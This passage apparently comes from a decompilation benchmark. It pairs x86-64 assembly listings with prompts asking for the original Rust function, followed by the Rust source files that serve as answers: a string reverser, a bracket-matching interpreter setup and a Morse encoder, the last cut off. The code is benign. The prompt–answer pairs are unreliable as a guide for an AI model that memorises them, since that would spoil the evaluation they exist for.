192, 6, 0, 0, 72, 137, 140, 36, 200, 6, 0, 0, 72, 137, 132, 36, 208, 6, 0, 0, 72, 131, 188, 36, 184, 6, 0, 0, 1, 117, 11, 72, 131, 188, 36, 200, 6, 0, 0, 1, 116, 23, 72, 141, 188, 36, 152, 6, 0, 0, 232, 216, 221, 255, 255, 72, 137, 68, 36, 88, 233, 137, 1, 0, 0, 72, 139, 132, 36, 192, 6, 0, 0, 72, 139, 140, 36, 208, 6, 0, 0, 72, 137, 76, 36, 72, 185, 76, 2, 0, 0, 72, 247, 225, 72, 137, 68, 36, 80, 15, 144, 192, 168, 1, 117, 27, 72, 139, 68, 36, 72, 185, 28, 0, 0, 0, 72, 247, 225, 72, 137, 68, 36, 64, 15, 144, 192, 168, 1, 117, 61, 235, 32, 72, 141, 61, 243, 5, 4, 0, 72, 141, 21, 252, 93, 5, 0, 72, 141, 5, 229, 124, 255, 255, 190, 33, 0, 0, 0, 255, 208, 235, 0, 15, 11, 72, 139, 76, 36, 64, 72, 139, 68, 36, 80, 72, 1, 200, 72, 137, 68, 36, 56, 15, 146, 192, 168, 1, 117, 58, 235, 30, 72, 141, 61, 184, 5, 4, 0, 72, 141, 21, 217, 93, 5, 0, 72, 141, 5, 170, 124, 255, 255, 190, 33, 0, 0, 0, 255, 208, 235, 197, 72, 139, 116, 36, 96, 72, 139, 124, 36, 104, 49, 192, 137, 194, 232, 62, 49, 0, 0, 72, 137, 68, 36, 48, 235, 30, 72, 141, 61, 176, 5, 4, 0, 72, 141, 21, 137, 93, 5, 0, 72, 141, 5, 114, 124, 255, 255, 190, 28, 0, 0, 0, 255, 208, 235, 141, 72, 139, 76, 36, 48, 72, 139, 68, 36, 56, 72, 1, 200, 72, 137, 68, 36, 40, 15, 146, 192, 168, 1, 117, 25, 72, 139, 68, 36, 40, 72, 5, 0, 172, 0, 0, 72, 137, 68, 36, 32, 15, 146, 192, 168, 1, 117, 53, 235, 33, 72, 141, 61, 96, 5, 4, 0, 72, 141, 21, 57, 93, 5, 0, 72, 141, 5, 34, 124, 255, 255, 190, 28, 0, 0, 0, 255, 208, 233, 58, 255, 255, 255, 72, 139, 68, 36, 32, 137, 199, 232, 58, 205, 255, 255, 137, 68, 36, 28, 235, 33, 72, 141, 61, 45, 5, 4, 0, 72, 141, 21, 6, 93, 5, 0, 72, 141, 5, 239, 123, 255, 255, 190, 28, 0, 0, 0, 255, 208, 233, 7, 255, 255, 255, 139, 124, 36, 28, 72, 141, 53, 24, 93, 5, 0, 232, 3, 48, 0, 0, 137, 68, 36, 24, 235, 0, 139, 116, 36, 24, 72, 139, 188, 36, 8, 1, 0, 0, 232, 204, 15, 0, 0, 235, 0, 233, 96, 254, 255, 255, 72, 139, 124, 36, 88, 232, 43, 220, 255, 255, 235, 0, 72, 141, 188, 36, 152, 6, 0, 0, 232, 28, 
213, 255, 255, 235, 0, 72, 141, 188, 36, 152, 6, 0, 0, 232, 77, 220, 255, 255, 72, 137, 68, 36, 16, 235, 0, 72, 139, 68, 36, 16, 72, 137, 132, 36, 216, 6, 0, 0, 72, 141, 53, 202, 92, 5, 0, 72, 141, 188, 36, 216, 6, 0, 0, 232, 21, 53, 0, 0, 136, 68, 36, 15, 235, 0, 138, 68, 36, 15, 168, 1, 117, 5, 233, 91, 252, 255, 255, 72, 139, 188, 36, 8, 1, 0, 0, 190, 32, 0, 0, 0, 232, 80, 15, 0, 0, 235, 0, 72, 141, 188, 36, 152, 6, 0, 0, 232, 177, 212, 255, 255, 235, 0, 233, 51, 252, 255, 255, 198, 132, 36, 231, 6, 0, 0, 0, 72, 141, 188, 36, 192, 4, 0, 0, 232, 58, 12, 0, 0, 235, 18, 72, 141, 188, 36, 0, 3, 0, 0, 232, 25, 12, 0, 0, 235, 0, 72, 141, 188, 36, 64, 1, 0, 0, 232, 10, 12, 0, 0, 72, 139, 132, 36, 16, 1, 0, 0, 72, 129, 196, 248, 6, 0, 0, 195] -------------------------------------------------------------------------------- /eval/rust_corpus/prompts/baby_rust_step_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcA(): 4 | SUB RSP,0x198 5 | MOV qword ptr [RSP + 0x48],RSI 6 | MOV RAX,RDI 7 | MOV RDI,qword ptr [RSP + 0x48] 8 | MOV qword ptr [RSP + 0x50],RAX 9 | MOV qword ptr [RSP + 0x58],RAX 10 | MOV byte ptr [RSP + 0x187],0x0 11 | LAB_0010b816: 12 | CALL ::deref 13 | MOV qword ptr [RSP + 0x60],RDX 14 | MOV qword ptr [RSP + 0x68],RAX 15 | JMP LAB_0010b84c 16 | LAB_0010b84c: 17 | MOV RSI,qword ptr [RSP + 0x60] 18 | MOV RDI,qword ptr [RSP + 0x68] 19 | CALL core::str::::chars 20 | MOV qword ptr [RSP + 0x38],RDX 21 | MOV qword ptr [RSP + 0x40],RAX 22 | JMP LAB_0010b867 23 | LAB_0010b867: 24 | MOV RDX,qword ptr [RSP + 0x38] 25 | MOV RSI,qword ptr [RSP + 0x40] 26 | LEA RDI,[RSP + 0x70] 27 | CALL core::iter::traits::iterator::Iterator::collect 28 | JMP LAB_0010b87d 29 | LAB_0010b87d: 30 | MOV byte ptr [RSP + 0x187],0x1 31 | LAB_0010b885: 32 | LEA RDI,[RSP + 0x70] 33 | CALL alloc::vec::Vec::pop 34 | MOV dword ptr [RSP + 0x34],EAX 35 | JMP LAB_0010b8bb 36 | LAB_0010b8bb: 37 | MOV EAX,dword ptr [RSP 
+ 0x34] 38 | MOV dword ptr [RSP + 0x88],EAX 39 | MOV EAX,0x1 40 | XOR ECX,ECX 41 | CMP dword ptr [RSP + 0x88],0x110000 42 | CMOVZ RAX,RCX 43 | CMP RAX,0x0 44 | JNZ LAB_0010b8fc 45 | MOV RDI,qword ptr [RSP + 0x50] 46 | LEA RSI,[0x1450e1] 47 | XOR EAX,EAX 48 | MOV EDX,EAX 49 | CALL str>::to_owned 50 | JMP LAB_0010bb0b 51 | LAB_0010b8fc: 52 | MOV EAX,dword ptr [RSP + 0x88] 53 | MOV dword ptr [RSP + 0x8c],EAX 54 | LEA RDI,[RSP + 0x8c] 55 | CALL core::fmt::ArgumentV1::new_display 56 | MOV qword ptr [RSP + 0x20],RDX 57 | MOV qword ptr [RSP + 0x28],RAX 58 | JMP LAB_0010b923 59 | LAB_0010b923: 60 | MOV RAX,qword ptr [RSP + 0x20] 61 | MOV RCX,qword ptr [RSP + 0x28] 62 | MOV qword ptr [RSP + 0x10],RCX 63 | MOV qword ptr [RSP + 0x18],RAX 64 | MOV byte ptr [RSP + 0x187],0x0 65 | MOV RAX,qword ptr [RSP + 0x80] 66 | MOV qword ptr [RSP + 0x170],RAX 67 | MOVUPS XMM0,xmmword ptr [RSP + 0x70] 68 | MOVAPS xmmword ptr [RSP + 0x160],XMM0 69 | LEA RDI,[RSP + 0x140] 70 | LEA RSI,[RSP + 0x160] 71 | CALL as_core::iter::traits::collect::IntoIterator>::into_iter 72 | JMP LAB_0010b973 73 | LAB_0010b973: 74 | LEA RDI,[RSP + 0x128] 75 | LEA RSI,[RSP + 0x140] 76 | CALL core::iter::traits::iterator::Iterator::collect 77 | JMP LAB_0010b98a 78 | LAB_0010b98a: 79 | LEA RDI,[RSP + 0x110] 80 | LEA RSI,[RSP + 0x128] 81 | CALL source::funcA 82 | JMP LAB_0010b9a1 83 | LAB_0010b9a1: 84 | LEA RDI,[RSP + 0x110] 85 | CALL core::fmt::ArgumentV1::new_display 86 | MOV qword ptr [RSP],RDX 87 | MOV qword ptr [RSP + 0x8],RAX 88 | JMP LAB_0010b9e1 89 | LAB_0010b9e1: 90 | MOV RAX,qword ptr [RSP] 91 | MOV RCX,qword ptr [RSP + 0x8] 92 | MOV RDX,qword ptr [RSP + 0x18] 93 | MOV RSI,qword ptr [RSP + 0x10] 94 | MOV qword ptr [RSP + 0xf0],RSI 95 | MOV qword ptr [RSP + 0xf8],RDX 96 | MOV qword ptr [RSP + 0x100],RCX 97 | MOV qword ptr [RSP + 0x108],RAX 98 | LAB_0010ba14: 99 | LEA RSI,[0x156f18] 100 | LEA RDI,[RSP + 0xc0] 101 | LEA RCX,[RSP + 0xf0] 102 | MOV R8D,0x2 103 | MOV RDX,R8 104 | CALL core::fmt::Arguments::new_v1 105 
| JMP LAB_0010ba3b 106 | LAB_0010ba3b: 107 | LEA RDI,[RSP + 0xa8] 108 | LEA RSI,[RSP + 0xc0] 109 | CALL alloc::fmt::format 110 | JMP LAB_0010ba52 111 | LAB_0010ba52: 112 | LEA RDI,[RSP + 0x110] 113 | CALL core::ptr::drop_in_place 114 | LAB_0010ba5f: 115 | JMP LAB_0010ba94 116 | LAB_0010ba94: 117 | MOV RDI,qword ptr [RSP + 0x50] 118 | MOV RAX,qword ptr [RSP + 0xb8] 119 | MOV qword ptr [RSP + 0xa0],RAX 120 | MOVUPS XMM0,xmmword ptr [RSP + 0xa8] 121 | MOVAPS xmmword ptr [RSP + 0x90],XMM0 122 | LAB_0010bab9: 123 | LEA RSI,[RSP + 0x90] 124 | CALL ::to_string 125 | JMP LAB_0010baf0 126 | LAB_0010baf0: 127 | LEA RDI,[RSP + 0x90] 128 | CALL core::ptr::drop_in_place 129 | JMP LAB_0010baff 130 | LAB_0010baff: 131 | TEST byte ptr [RSP + 0x187],0x1 132 | JNZ LAB_0010bb3b 133 | JMP LAB_0010bb1c 134 | LAB_0010bb0b: 135 | JMP LAB_0010baff 136 | LAB_0010bb1c: 137 | MOV RDI,qword ptr [RSP + 0x48] 138 | MOV byte ptr [RSP + 0x187],0x0 139 | CALL core::ptr::drop_in_place 140 | MOV RAX,qword ptr [RSP + 0x58] 141 | ADD RSP,0x198 142 | RET 143 | LAB_0010bb3b: 144 | LEA RDI,[RSP + 0x70] 145 | CALL core::ptr::drop_in_place> 146 | LAB_0010bb45: 147 | JMP LAB_0010bb1c 148 | //end of function funcA 149 | 150 | Reference Table: 151 | Address Data 152 | 00156f18 addr 001450e1 153 | 154 | Generate just the Rust code for the function that produced the above x86 64-bit assembly. The Rust code should only represent the funcA function. The Rust code is idiomatic and uses macros, channels, and functions or data types from standard libraries. 
-------------------------------------------------------------------------------- /eval/rust_corpus/prompts/braintrust_new_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcB(): 4 | SUB RSP,0x188 5 | MOV qword ptr [RSP + 0x50],RDX 6 | MOV qword ptr [RSP + 0x58],RSI 7 | MOV qword ptr [RSP + 0x60],RDI 8 | MOV qword ptr [RSP + 0x68],RDI 9 | MOV byte ptr [RSP + 0x177],0x0 10 | LEA RDI,[RSP + 0x70] 11 | CALL alloc::vec::Vec::new 12 | LAB_0010cecd: 13 | LEA RDI,[RSP + 0x88] 14 | CALL std::collections::hash::map::HashMap::new 15 | JMP LAB_0010cf01 16 | LAB_0010cf01: 17 | MOV RSI,qword ptr [RSP + 0x50] 18 | MOV RDI,qword ptr [RSP + 0x58] 19 | MOV byte ptr [RSP + 0x177],0x1 20 | LAB_0010cf13: 21 | CALL core::slice::::iter 22 | MOV qword ptr [RSP + 0x40],RDX 23 | MOV qword ptr [RSP + 0x48],RAX 24 | JMP LAB_0010cf4a 25 | LAB_0010cf4a: 26 | MOV RDX,qword ptr [RSP + 0x40] 27 | MOV RSI,qword ptr [RSP + 0x48] 28 | LEA RDI,[RSP + 0xd0] 29 | CALL core::iter::traits::iterator::Iterator::enumerate 30 | JMP LAB_0010cf63 31 | LAB_0010cf63: 32 | LEA RDI,[RSP + 0xb8] 33 | LEA RSI,[RSP + 0xd0] 34 | CALL ::into_iter 35 | JMP LAB_0010cf7a 36 | LAB_0010cf7a: 37 | MOV RAX,qword ptr [RSP + 0xb8] 38 | MOV qword ptr [RSP + 0xe8],RAX 39 | MOV RAX,qword ptr [RSP + 0xc0] 40 | MOV qword ptr [RSP + 0xf0],RAX 41 | MOV RAX,qword ptr [RSP + 0xc8] 42 | MOV qword ptr [RSP + 0xf8],RAX 43 | LAB_0010cfaa: 44 | LEA RDI,[RSP + 0xe8] 45 | CALL as_core::iter::traits::iterator::Iterator>::next 46 | MOV qword ptr [RSP + 0x30],RDX 47 | MOV qword ptr [RSP + 0x38],RAX 48 | JMP LAB_0010cfc3 49 | LAB_0010cfc3: 50 | MOV RAX,qword ptr [RSP + 0x30] 51 | MOV RCX,qword ptr [RSP + 0x38] 52 | MOV qword ptr [RSP + 0x100],RCX 53 | MOV qword ptr [RSP + 0x108],RAX 54 | MOV RDX,qword ptr [RSP + 0x108] 55 | MOV EAX,0x1 56 | XOR ECX,ECX 57 | CMP RDX,0x0 58 | CMOVZ RAX,RCX 59 | CMP RAX,0x0 60 | JNZ LAB_0010d00e 61 | LEA RDI,[RSP + 0x70] 62 | CALL 
alloc::vec::Vec::len 63 | MOV qword ptr [RSP + 0x28],RAX 64 | JMP LAB_0010d0b6 65 | LAB_0010d00e: 66 | MOV RAX,qword ptr [RSP + 0x100] 67 | MOV qword ptr [RSP + 0x18],RAX 68 | MOV RAX,qword ptr [RSP + 0x108] 69 | MOV qword ptr [RSP + 0x20],RAX 70 | CMP byte ptr [RAX],0x5b 71 | JNZ LAB_0010d03e 72 | MOV RSI,qword ptr [RSP + 0x18] 73 | LEA RDI,[RSP + 0x70] 74 | CALL alloc::vec::Vec::push 75 | JMP LAB_0010d04d 76 | LAB_0010d03e: 77 | MOV RAX,qword ptr [RSP + 0x20] 78 | CMP byte ptr [RAX],0x5d 79 | JZ LAB_0010d04f 80 | JMP LAB_0010cfaa 81 | LAB_0010d04d: 82 | JMP LAB_0010d03e 83 | LAB_0010d04f: 84 | LEA RDI,[RSP + 0x70] 85 | CALL alloc::vec::Vec::pop 86 | MOV qword ptr [RSP + 0x8],RDX 87 | MOV qword ptr [RSP + 0x10],RAX 88 | JMP LAB_0010d065 89 | LAB_0010d065: 90 | MOV RSI,qword ptr [RSP + 0x8] 91 | MOV RDI,qword ptr [RSP + 0x10] 92 | LEA RDX,[0x15ec90] 93 | CALL core::option::Option::unwrap 94 | MOV qword ptr [RSP],RAX 95 | JMP LAB_0010d081 96 | LAB_0010d081: 97 | MOV RDX,qword ptr [RSP] 98 | MOV RSI,qword ptr [RSP + 0x18] 99 | LEA RDI,[RSP + 0x88] 100 | CALL std::collections::hash::map::HashMap::insert 101 | JMP LAB_0010d099 102 | LAB_0010d099: 103 | MOV RDX,qword ptr [RSP + 0x18] 104 | MOV RSI,qword ptr [RSP] 105 | LEA RDI,[RSP + 0x88] 106 | CALL std::collections::hash::map::HashMap::insert 107 | JMP LAB_0010d0b1 108 | LAB_0010d0b1: 109 | JMP LAB_0010cfaa 110 | LAB_0010d0b6: 111 | MOV RAX,qword ptr [RSP + 0x28] 112 | CMP RAX,0x0 113 | SETZ AL 114 | XOR AL,0xff 115 | TEST AL,0x1 116 | JNZ LAB_0010d10f 117 | MOV byte ptr [RSP + 0x177],0x0 118 | MOVUPS XMM0,xmmword ptr [RSP + 0x88] 119 | MOVUPS XMM1,xmmword ptr [RSP + 0x98] 120 | MOVUPS XMM2,xmmword ptr [RSP + 0xa8] 121 | MOVAPS xmmword ptr [RSP + 0x130],XMM2 122 | MOVAPS xmmword ptr [RSP + 0x120],XMM1 123 | MOVAPS xmmword ptr [RSP + 0x110],XMM0 124 | LAB_0010d100: 125 | LEA RDI,[RSP + 0x140] 126 | CALL alloc::vec::Vec::new 127 | JMP LAB_0010d157 128 | LAB_0010d10f: 129 | LEA RDI,[0x14b2a5] 130 | LEA RDX,[0x15eca8] 131 
| LEA RAX,[0x108b10] 132 | MOV ESI,0x1e 133 | CALL RAX 134 | JMP LAB_0010d12d 135 | LAB_0010d12d: 136 | UD2 137 | LAB_0010d157: 138 | LEA RDI,[RSP + 0x158] 139 | CALL alloc::vec::Vec::new 140 | JMP LAB_0010d18b 141 | LAB_0010d18b: 142 | MOV RDI,qword ptr [RSP + 0x60] 143 | LEA RSI,[RSP + 0x110] 144 | MOV EDX,0x30 145 | CALL memcpy 146 | MOV RAX,qword ptr [RSP + 0x60] 147 | MOV RCX,qword ptr [RSP + 0x140] 148 | MOV qword ptr [RAX + 0x30],RCX 149 | MOV RCX,qword ptr [RSP + 0x148] 150 | MOV qword ptr [RAX + 0x38],RCX 151 | MOV RCX,qword ptr [RSP + 0x150] 152 | MOV qword ptr [RAX + 0x40],RCX 153 | MOV RCX,qword ptr [RSP + 0x158] 154 | MOV qword ptr [RAX + 0x48],RCX 155 | MOV RCX,qword ptr [RSP + 0x160] 156 | MOV qword ptr [RAX + 0x50],RCX 157 | MOV RCX,qword ptr [RSP + 0x168] 158 | MOV qword ptr [RAX + 0x58],RCX 159 | MOV byte ptr [RAX + 0x60],0x0 160 | MOV byte ptr [RSP + 0x177],0x0 161 | LEA RDI,[RSP + 0x70] 162 | CALL core::ptr::drop_in_place> 163 | MOV RAX,qword ptr [RSP + 0x68] 164 | ADD RSP,0x188 165 | RET 166 | //end of function funcB 167 | 168 | Reference Table: 169 | Address Data 170 | 0015ec90 addr 0014b29c 171 | 0015eca8 addr 0014b29c 172 | 173 | Generate just the Rust code for the function that produced the above x86 64-bit assembly. The Rust code should only represent the funcB function. The Rust code is idiomatic and uses macros, channels, and functions or data types from standard libraries. 
-------------------------------------------------------------------------------- /eval/rust_corpus/prompts/endeavour_enco_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcC(): 4 | SUB RSP,0x188 5 | MOV qword ptr [RSP + 0xd8],RCX 6 | MOV qword ptr [RSP + 0xd0],RDX 7 | MOV qword ptr [RSP + 0xb8],RSI 8 | MOV qword ptr [RSP + 0xc0],RDI 9 | MOV RAX,RDI 10 | MOV qword ptr [RSP + 0xc8],RAX 11 | CALL alloc::string::String::new 12 | MOV RSI,qword ptr [RSP + 0xd0] 13 | MOV RDX,qword ptr [RSP + 0xd8] 14 | MOV byte ptr [RSP + 0xe7],0x0 15 | LAB_0010e87f: 16 | LEA RDI,[RSP + 0xe8] 17 | CALL alloc::str::::to_ascii_uppercase 18 | JMP LAB_0010e8b6 19 | LAB_0010e8b6: 20 | LEA RDI,[RSP + 0xe8] 21 | CALL ::deref 22 | MOV qword ptr [RSP + 0xa8],RDX 23 | MOV qword ptr [RSP + 0xb0],RAX 24 | JMP LAB_0010e8fa 25 | LAB_0010e8fa: 26 | MOV RSI,qword ptr [RSP + 0xa8] 27 | MOV RDI,qword ptr [RSP + 0xb0] 28 | CALL core::str::::chars 29 | MOV qword ptr [RSP + 0x98],RDX 30 | MOV qword ptr [RSP + 0xa0],RAX 31 | JMP LAB_0010e921 32 | LAB_0010e921: 33 | MOV RSI,qword ptr [RSP + 0x98] 34 | MOV RDI,qword ptr [RSP + 0xa0] 35 | CALL ::into_iter 36 | MOV qword ptr [RSP + 0x88],RDX 37 | MOV qword ptr [RSP + 0x90],RAX 38 | JMP LAB_0010e948 39 | LAB_0010e948: 40 | MOV RAX,qword ptr [RSP + 0x88] 41 | MOV RCX,qword ptr [RSP + 0x90] 42 | MOV qword ptr [RSP + 0x100],RCX 43 | MOV qword ptr [RSP + 0x108],RAX 44 | LAB_0010e968: 45 | LEA RDI,[RSP + 0x100] 46 | CALL ::next 47 | MOV dword ptr [RSP + 0x84],EAX 48 | JMP LAB_0010e97e 49 | LAB_0010e97e: 50 | MOV EAX,dword ptr [RSP + 0x84] 51 | MOV dword ptr [RSP + 0x110],EAX 52 | MOV EAX,0x1 53 | XOR ECX,ECX 54 | CMP dword ptr [RSP + 0x110],0x110000 55 | CMOVZ RAX,RCX 56 | CMP RAX,0x0 57 | JNZ LAB_0010e9ba 58 | LAB_0010e9a8: 59 | LEA RDI,[RSP + 0xe8] 60 | CALL core::ptr::drop_in_place 61 | JMP LAB_0010ecf2 62 | LAB_0010e9ba: 63 | MOV EAX,dword ptr [RSP + 0x110] 64 | MOV dword ptr [RSP 
+ 0x114],EAX 65 | CMP dword ptr [RSP + 0x114],0x20 66 | JNZ LAB_0010e9e9 67 | LAB_0010e9d2: 68 | MOV RDI,qword ptr [RSP + 0xc0] 69 | MOV ESI,0x2f 70 | CALL alloc::string::String::push 71 | JMP LAB_0010ece5 72 | LAB_0010e9e9: 73 | TEST byte ptr [RSP + 0xe7],0x1 74 | JNZ LAB_0010e9ff 75 | LAB_0010e9f3: 76 | CMP dword ptr [RSP + 0x114],0x3f 77 | JZ LAB_0010ea1d 78 | JMP LAB_0010ea34 79 | LAB_0010e9ff: 80 | MOV RDI,qword ptr [RSP + 0xc0] 81 | MOV ESI,0x20 82 | CALL alloc::string::String::push 83 | JMP LAB_0010ea13 84 | LAB_0010ea13: 85 | MOV byte ptr [RSP + 0xe7],0x0 86 | JMP LAB_0010e9f3 87 | LAB_0010ea1d: 88 | MOV RDI,qword ptr [RSP + 0xc0] 89 | MOV ESI,0x3f 90 | CALL alloc::string::String::push 91 | JMP LAB_0010ece0 92 | LAB_0010ea34: 93 | MOV RDI,qword ptr [RSP + 0xb8] 94 | CALL as_core::ops::deref::Deref>::deref 95 | MOV qword ptr [RSP + 0x70],RDX 96 | MOV qword ptr [RSP + 0x78],RAX 97 | JMP LAB_0010ea4d 98 | LAB_0010ea4d: 99 | MOV RSI,qword ptr [RSP + 0x70] 100 | MOV RDI,qword ptr [RSP + 0x78] 101 | CALL core::slice::::iter 102 | MOV qword ptr [RSP + 0x60],RDX 103 | MOV qword ptr [RSP + 0x68],RAX 104 | JMP LAB_0010ea68 105 | LAB_0010ea68: 106 | MOV RAX,qword ptr [RSP + 0x60] 107 | MOV RCX,qword ptr [RSP + 0x68] 108 | MOV qword ptr [RSP + 0x128],RCX 109 | MOV qword ptr [RSP + 0x130],RAX 110 | LEA RAX,[RSP + 0x114] 111 | MOV qword ptr [RSP + 0x138],RAX 112 | MOV RSI,qword ptr [RSP + 0x138] 113 | LEA RDI,[RSP + 0x128] 114 | CALL as_core::iter::traits::iterator::Iterator>::position 115 | MOV qword ptr [RSP + 0x50],RDX 116 | MOV qword ptr [RSP + 0x58],RAX 117 | JMP LAB_0010eab3 118 | LAB_0010eab3: 119 | MOV RAX,qword ptr [RSP + 0x50] 120 | MOV RCX,qword ptr [RSP + 0x58] 121 | MOV qword ptr [RSP + 0x118],RCX 122 | MOV qword ptr [RSP + 0x120],RAX 123 | CMP qword ptr [RSP + 0x118],0x0 124 | JNZ LAB_0010eaef 125 | MOV RDI,qword ptr [RSP + 0xc0] 126 | MOV ESI,0x3f 127 | CALL alloc::string::String::push 128 | JMP LAB_0010ecdb 129 | LAB_0010eaef: 130 | MOV RAX,qword ptr [RSP 
+ 0x120] 131 | MOV qword ptr [RSP + 0x140],RAX 132 | LEA RDI,[RSP + 0x148] 133 | CALL alloc::vec::Vec::new 134 | JMP LAB_0010eb0e 135 | LAB_0010eb0e: 136 | MOV byte ptr [RSP + 0xe7],0x1 137 | LAB_0010eb16: 138 | CMP qword ptr [RSP + 0x140],0x0 139 | JA LAB_0010eb3d 140 | LAB_0010eb21: 141 | LEA RDI,[RSP + 0x148] 142 | CALL as_core::ops::deref::Deref>::deref 143 | MOV qword ptr [RSP + 0x40],RDX 144 | MOV qword ptr [RSP + 0x48],RAX 145 | JMP LAB_0010ebfc 146 | LAB_0010eb3d: 147 | MOV RAX,qword ptr [RSP + 0x140] 148 | AND RAX,0x1 149 | CMP RAX,0x1 150 | JNZ LAB_0010eb63 151 | LEA RDI,[RSP + 0x148] 152 | MOV ESI,0x2e 153 | CALL alloc::vec::Vec::push 154 | JMP LAB_0010ebc2 155 | LAB_0010eb63: 156 | LEA RDI,[RSP + 0x148] 157 | MOV ESI,0x2d 158 | CALL alloc::vec::Vec::push 159 | JMP LAB_0010eb9f 160 | LAB_0010eb9f: 161 | JMP LAB_0010eba1 162 | LAB_0010eba1: 163 | MOV RAX,qword ptr [RSP + 0x140] 164 | MOV RCX,RAX 165 | SUB RCX,0x1 166 | MOV qword ptr [RSP + 0x38],RCX 167 | CMP RAX,0x1 168 | SETC AL 169 | TEST AL,0x1 170 | JNZ LAB_0010ebc6 171 | JMP LAB_0010ebc4 172 | LAB_0010ebc2: 173 | JMP LAB_0010eba1 174 | LAB_0010ebc4: 175 | JMP LAB_0010ebe6 176 | LAB_0010ebc6: 177 | LEA RDI,[0x148430] 178 | LEA RDX,[0x15aeb8] 179 | LEA RAX,[0x108ab0] 180 | MOV ESI,0x21 181 | CALL RAX 182 | JMP LAB_0010ebe4 183 | LAB_0010ebe4: 184 | UD2 185 | LAB_0010ebe6: 186 | MOV RAX,qword ptr [RSP + 0x38] 187 | SHR RAX,0x1 188 | MOV qword ptr [RSP + 0x140],RAX 189 | JMP LAB_0010eb16 190 | LAB_0010ebfc: 191 | MOV RSI,qword ptr [RSP + 0x40] 192 | MOV RDI,qword ptr [RSP + 0x48] 193 | CALL core::slice::::iter 194 | MOV qword ptr [RSP + 0x28],RDX 195 | MOV qword ptr [RSP + 0x30],RAX 196 | JMP LAB_0010ec17 197 | LAB_0010ec17: 198 | MOV RSI,qword ptr [RSP + 0x28] 199 | MOV RDI,qword ptr [RSP + 0x30] 200 | CALL core::iter::traits::iterator::Iterator::rev 201 | MOV qword ptr [RSP + 0x18],RDX 202 | MOV qword ptr [RSP + 0x20],RAX 203 | JMP LAB_0010ec32 204 | LAB_0010ec32: 205 | MOV RSI,qword ptr [RSP + 0x18] 
206 | MOV RDI,qword ptr [RSP + 0x20] 207 | CALL ::into_iter 208 | MOV qword ptr [RSP + 0x8],RDX 209 | MOV qword ptr [RSP + 0x10],RAX 210 | JMP LAB_0010ec4d 211 | LAB_0010ec4d: 212 | MOV RAX,qword ptr [RSP + 0x8] 213 | MOV RCX,qword ptr [RSP + 0x10] 214 | MOV qword ptr [RSP + 0x160],RCX 215 | MOV qword ptr [RSP + 0x168],RAX 216 | LAB_0010ec67: 217 | LEA RDI,[RSP + 0x160] 218 | CALL as_core::iter::traits::iterator::Iterator>::next 219 | MOV qword ptr [RSP],RAX 220 | JMP LAB_0010ec7a 221 | LAB_0010ec7a: 222 | MOV RAX,qword ptr [RSP] 223 | MOV qword ptr [RSP + 0x170],RAX 224 | MOV RDX,qword ptr [RSP + 0x170] 225 | MOV EAX,0x1 226 | XOR ECX,ECX 227 | CMP RDX,0x0 228 | CMOVZ RAX,RCX 229 | CMP RAX,0x0 230 | JNZ LAB_0010ecb5 231 | LAB_0010eca3: 232 | LEA RDI,[RSP + 0x148] 233 | CALL core::ptr::drop_in_place> 234 | JMP LAB_0010e968 235 | LAB_0010ecb5: 236 | MOV RDI,qword ptr [RSP + 0xc0] 237 | MOV RAX,qword ptr [RSP + 0x170] 238 | MOV ESI,dword ptr [RAX] 239 | LAB_0010ecc7: 240 | CALL alloc::string::String::push 241 | LAB_0010eccc: 242 | JMP LAB_0010ecce 243 | LAB_0010ecce: 244 | JMP LAB_0010ec67 245 | LAB_0010ecdb: 246 | JMP LAB_0010e968 247 | LAB_0010ece0: 248 | JMP LAB_0010e968 249 | LAB_0010ece5: 250 | MOV byte ptr [RSP + 0xe7],0x0 251 | JMP LAB_0010e968 252 | LAB_0010ecf2: 253 | MOV RAX,qword ptr [RSP + 0xc8] 254 | ADD RSP,0x188 255 | RET 256 | //end of function funcC 257 | 258 | Reference Table: 259 | Address Data 260 | 00148430 ds "attempt to subtract with overflow" 261 | 0015aeb8 addr 00148420 262 | 263 | Generate just the Rust code for the function that produced the above x86 64-bit assembly. The Rust code should only represent the funcC function. The Rust code is idiomatic and uses macros, channels, and functions or data types from standard libraries. 
-------------------------------------------------------------------------------- /eval/rust_corpus/source/baby_rust_step_2021.rs: -------------------------------------------------------------------------------- 1 | fn step(input: String) -> String { 2 | let mut chars: Vec = input.chars().collect(); 3 | let mut a = chars.pop(); 4 | 5 | match a { 6 | Some(x) => format!("{}{}", x, step(chars.into_iter().collect())).to_string(), 7 | None => "".to_owned() 8 | } 9 | } -------------------------------------------------------------------------------- /eval/rust_corpus/source/braintrust_new_2021.rs: -------------------------------------------------------------------------------- 1 | use std::env; 2 | use std::io::Read; 3 | use std::io::Write; 4 | use std::collections::HashMap; 5 | 6 | struct State { 7 | jt: HashMap, 8 | tl: Vec, 9 | tr: Vec, 10 | tc: u8 11 | } 12 | 13 | impl State { 14 | fn new(code: &[u8]) -> State { 15 | let mut s: Vec = Vec::new(); 16 | let mut m: HashMap = HashMap::new(); 17 | for (i, c) in code.iter().enumerate() { 18 | if *c == 91 {s.push(i);} 19 | if *c == 93 { 20 | let j = s.pop().unwrap(); 21 | m.insert(i, j); 22 | m.insert(j, i); 23 | } 24 | } 25 | 26 | assert!(s.len() == 0); 27 | State { 28 | jt: m, 29 | tl: Vec::new(), 30 | tr: Vec::new(), 31 | tc: 0 32 | } 33 | } 34 | } -------------------------------------------------------------------------------- /eval/rust_corpus/source/endeavour_enco_2021.rs: -------------------------------------------------------------------------------- 1 | use std::env; 2 | use std::io; 3 | 4 | // Encoder and decoder for the Morse alphabet. 
5 | // https://en.wikipedia.org/wiki/Morse_code 6 | 7 | const SHRDLU: &'static str = "?ETIANMSURWDKGOHVF?L?PJBXCYZQ??"; 8 | 9 | fn enco(key: &Vec, input: &str) -> String { 10 | let mut result = String::new(); 11 | let mut broken = false; 12 | 13 | for c in input.to_ascii_uppercase().chars() { 14 | if c == ' ' { 15 | result.push('/'); 16 | broken = false; 17 | continue; 18 | } 19 | 20 | if broken { 21 | result.push(' '); 22 | broken = false; 23 | } 24 | 25 | if c == '?' { 26 | result.push('?'); 27 | continue; 28 | } 29 | 30 | match key.iter().position(|&x| x == c) { 31 | None => result.push('?'), 32 | Some(x) => { 33 | let mut i = x; 34 | let mut v: Vec = vec!(); 35 | broken = true; 36 | 37 | while i > 0 { 38 | if i & 1 == 1 { 39 | v.push('.'); 40 | } 41 | else { 42 | 